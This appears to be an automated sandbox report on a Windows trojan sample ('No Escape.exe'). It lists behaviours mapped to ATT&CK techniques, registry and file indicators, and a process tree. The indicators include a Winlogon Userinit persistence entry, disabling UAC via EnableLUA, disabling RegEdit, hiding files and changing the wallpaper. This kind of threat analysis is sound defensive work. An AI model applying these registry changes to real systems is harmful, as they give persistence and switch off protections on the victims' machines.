68310e7362e3f6a42dfd3f30b1664d5bce98045d606ba9e321ae5a2aa12fb034

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2064	attrib.exe
4744	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	wscript.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg"	reg.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\	No Escape.exe
File created	C:\Program Files (x86)\erode.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.reg	No Escape.exe
File created	C:\Program Files (x86)\launch.exe	No Escape.exe
File created	C:\Program Files (x86)\msg.exe	No Escape.exe
File created	C:\Program Files (x86)\shaking.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.bat	No Escape.exe
File created	C:\Program Files (x86)\hello.jpg	No Escape.exe
File created	C:\Program Files (x86)\mover.exe	No Escape.exe
File created	C:\Program Files (x86)\mypc.exe	No Escape.exe
File created	C:\Program Files (x86)\date.txt	No Escape.exe
File created	C:\Program Files (x86)\	No Escape.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	No Escape.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879088017663847"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "17"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-446031748-3036493239-2009529691-1000\{495C014C-59B7-4133-8E61-1D17D075D474}	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
4992	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
5240	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
2516	chrome.exe
2516	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: 33	3804	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3804	AUDIODG.EXE
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe
Token: SeShutdownPrivilege	4896	chrome.exe
Token: SeCreatePagefilePrivilege	4896	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe
4896	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
996	No Escape.exe
5428	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 4956	4896	chrome.exe	99
PID 4896 wrote to memory of 4956	4896	chrome.exe	99
PID 4896 wrote to memory of 5844	4896	chrome.exe	100
PID 4896 wrote to memory of 5844	4896	chrome.exe	100
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5988	4896	chrome.exe	101
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102
PID 4896 wrote to memory of 5612	4896	chrome.exe	102

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2064	attrib.exe
4744	attrib.exe

C:\Users\Admin\AppData\Local\Temp\EasyInstallerV2.exe
"C:\Users\Admin\AppData\Local\Temp\EasyInstallerV2.exe"
1⤵
PID:5728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa7379dcf8,0x7ffa7379dd04,0x7ffa7379dd10
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1952,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:5844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2088,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2080 /prefetch:2
  2⤵
  PID:5988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2412 /prefetch:8
  2⤵
  PID:5612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:3364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3120 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4432 /prefetch:2
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4720,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  PID:5872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5648,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5756 /prefetch:8
  2⤵
  PID:4132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5752,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5904 /prefetch:8
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5560,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5776 /prefetch:8
  2⤵
  PID:1916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5916,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5408,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:5740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3880,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2972 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6076,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6124 /prefetch:8
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3320 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3180,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3348 /prefetch:8
  2⤵
  PID:5264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=220,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5796 /prefetch:8
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5788,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5776,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3892 /prefetch:8
  2⤵
  PID:3764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6068,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3360 /prefetch:2
  2⤵
  PID:5880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=1152,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4704 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6392,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6484,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:3844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5592,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6740,i,6184220819843885447,16130168219058917959,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6724 /prefetch:1
  2⤵
  PID:5992
